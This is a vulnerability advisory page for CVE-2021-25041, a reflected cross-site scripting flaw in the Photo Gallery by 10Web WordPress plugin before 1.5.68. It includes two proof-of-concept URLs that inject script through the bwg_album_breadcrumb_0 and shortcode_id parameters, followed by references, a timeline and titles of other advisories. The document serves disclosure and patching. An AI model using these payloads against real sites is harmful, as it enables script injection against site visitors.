Photo Gallery by 10Web < 1.5.68 – Reflected Cross-Site Scripting (XSS) | CVE 2021-25041 | Plugin Vulnerabilities

Description

The plugin is vulnerable to Reflected Cross-Site Scripting (XSS) issues via the bwg_album_breadcrumb_0 and shortcode_id GET parameters passed to the bwg_frontend_data AJAX action

Proof of Concept

https://example.com/wp-admin/admin-ajax.php?action=bwg_frontend_data&bwg_album_breadcrumb_0=[{"id":"1'><img/src=x onerror=alert(1)>","page":1},{"id":"1","page":1}]&gallery_type=album_extended_preview

https://example.com/wp-admin/admin-ajax.php?action=bwg_frontend_data&gallery_type=image_browser&gallery_id=1&tag=0&album_id=0&theme_id=1&shortcode_id=1%22%20onmouseover=alert(id)//

Affects Plugins

Fixed in 1.5.68

References

CVE

URL

https://packetstormsecurity.com/files/#162227/

URL

https://plugins.trac.wordpress.org/changeset/2467205

Classification

Type

XSS

OWASP top 10

A7: Cross-Site Scripting (XSS)

CWE

CVSS

Miscellaneous

Original Researcher

ThuraMoeMyint

Verified

Yes

WPVDB ID

32aee3ea-e0af-44da-a16c-102c83eaed8f

Timeline

Publicly Published

2021-02-03 (about 3 years ago)

Added

2021-02-04 (about 3 years ago)

Last Updated

2022-04-11 (about 2 years ago)

Other

Published

Title

Published

2023-05-26

Title

SlideOnline <= 1.2.1 - Contributor+ Stored XSS

Published

2023-07-12

Title

Coming Soon Chop Chop <= 2.2.4 - Reflected XSS

Published

2023-10-20

Title

Carousel, Recent Post Slider and Banner Slider < 2.1 - Contributor+ Stored Cross-Site Scripting

Published

2013-12-09

Title

Spider Video Player <= 2.1 - Reflected Cross-Site Scripting (XSS)

Published

2021-07-26

Title

Paid Member Subscriptions < 2.4.2 - Reflected Cross-Site Scripting (XSS)